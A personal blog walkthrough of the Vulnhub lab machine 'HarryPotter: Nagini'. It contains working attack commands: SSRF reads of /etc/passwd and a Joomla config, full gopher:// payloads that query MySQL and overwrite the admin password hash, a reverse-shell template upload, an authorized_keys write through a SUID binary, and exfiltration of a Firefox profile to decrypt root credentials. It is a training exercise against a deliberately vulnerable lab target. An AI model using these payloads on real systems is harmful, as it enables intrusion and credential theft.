Windy's little blog

一切生活中的杂七杂八, and I like CTF.

Vulnhub HarryPotter: Nagini Walkthrough (SSRF with Gopher)

https://www.vulnhub.com/entry/harrypotter-nagini,689/


Very interesting machine, first time for me to do SSRF with Gopher.


Nmap scan ports first.

nmap -sV -sC -p- 192.168.56.99  -oN ports.log

图片.png


Scan port 80, find note.txt and joomla CMS.

gobuster dir -u http://192.168.56.98 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt -b 401,403,404,500 --wildcard  -o 80.log

图片.png


Note.txt told us, we need http3 protocol.

图片.png


Add quic.nagini.hogwarts to /etc/hosts. Then compile a custom curl following this tutorial:

https://github.com/curl/curl/blob/master/docs/HTTP3.md


Now we'll get a custom curl with http3 support.

图片.png


Visit the site with http3, get a new note, which told us 2 hints, 1st, there is a internalResourceFeTcher.php, 2nd, there is configuration bak file.

图片.png


Check internalResourceFeTcher.php, it's a php file with SSRF.

图片.png


Use file:// protocol, we can get content of /etc/passwd.

curl 'http://quic.nagini.hogwarts/internalResourceFeTcher.php?url=file:///etc/passwd'

图片.png


Then we can get configuration.php (or configuration.php.bak) of joomla, and get the user name of mysql.

Also, we can get the db name and db prefix for joomla CMS.

curl 'http://quic.nagini.hogwarts/internalResourceFeTcher.php?url=file:///var/www/html/joomla/configuration.php'

图片.png


After google a lot and thanks for the hints from guys @vulnhub discord channel, I know the next step is to use gopher to run mysql cmd to get information.

Here we need a tool:https://github.com/tarunkant/Gopherus. Run gopherus, it will generate the gopher link. Let's try sql cmd 'use joomla;show tables;'

gopher://127.0.0.1:3306/_%a6%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%67%6f%62%6c%69%6e%65%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%18%00%00%00%03%75%73%65%20%6a%6f%6f%6d%6c%61%3b%73%68%6f%77%20%74%61%62%6c%65%73%3b%01%00%00%00%01

Then we need to url encode the gopher link. It's important, I stuck here for a looooong time.

Then we have to visit the site with url from browser. (curl does not work here.) If there is no content displayed, just refresh the page for some times.

http://quic.nagini.hogwarts/internalResourceFeTcher.php?url=gopher:%2f%2f127.0.0.1:3306%2f_%25a5%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2567%256f%2562%256c%2569%256e%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2518%2500%2500%2500%2503%2575%2573%2565%2520%256a%256f%256f%256d%256c%2561%253b%2573%2568%256f%2577%2520%2574%2561%2562%256c%2565%2573%253b%2501%2500%2500%2500%2501


图片.png


Then we can check content of table "joomla_users".

Use gopherus to generate the gopher link of "use joomla;select * from joomla_users;"

图片.png

gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%67%6f%62%6c%69%6e%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%27%00%00%00%03%75%73%65%20%6a%6f%6f%6d%6c%61%3b%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%6a%6f%6f%6d%6c%61%5f%75%73%65%72%73%3b%01%00%00%00%01


Then visit the site again. Now we get the user name and password hash of "site_admin"

http://quic.nagini.hogwarts/internalResourceFeTcher.php?url=gopher:%2f%2f127.0.0.1:3306%2f_%25a5%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2567%256f%2562%256c%2569%256e%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2527%2500%2500%2500%2503%2575%2573%2565%2520%256a%256f%256f%256d%256c%2561%253b%2573%2565%256c%2565%2563%2574%2520%252a%2520%2566%2572%256f%256d%2520%256a%256f%256f%256d%256c%2561%255f%2575%2573%2565%2572%2573%253b%2501%2500%2500%2500%2501

图片.png


The password hash can not be cracked online, so we have to modify it. Let's use the md5 hash of "password" string:5f4dcc3b5aa765d61d8327deb882cf99.

And use gopherus to generate link of command:

use joomla; update joomla_users set password = '5f4dcc3b5aa765d61d8327deb882cf99' where username='site_admin';select * from joomla_users;

If it works, we will see new password hash on webpage.


图片.png


Now we can login control panel of joomla CMS with site_admin:password.

图片.png


In template editing, we can create a new file rev.php, with reverse shell code. Or we can directly modify index.php, add reverse shell code in it.

图片.png


Listen as port 1234, and visit http://192.168.56.99/joomla/templates/protostar/rev.php.

图片.png


In snape's home folder, we found .creds.txt, which is base64 code of snape's password.

With this password, we can login ssh as user snape.

图片.png


Find SUID file, notice su_cp.

图片.png


su_cp just copy some file from src to dest. So we can upload id_rsa.pub, and copy it to /home/hermoine/.ssh/authorized_keys.

Then we can login ssh as user hermoine without password.

图片.png



In home, we found .mozilla folder.

图片.png


Remote copy the whole .mozilla folder to local machine.

scp -rp hermoine@quic.nagini.hogwarts:/home/hermoine/.mozilla /tmp


Download the magic script from here:https://github.com/unode/firefox_decrypt

Then we can get root credentials using this script.

图片.png


Thanks wish@discord for the first writeup. You can check it here:

https://vishal-chandak.medium.com/vulnhub-harrypotter-nagini-walkthrough-68259262e9cf





 

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.0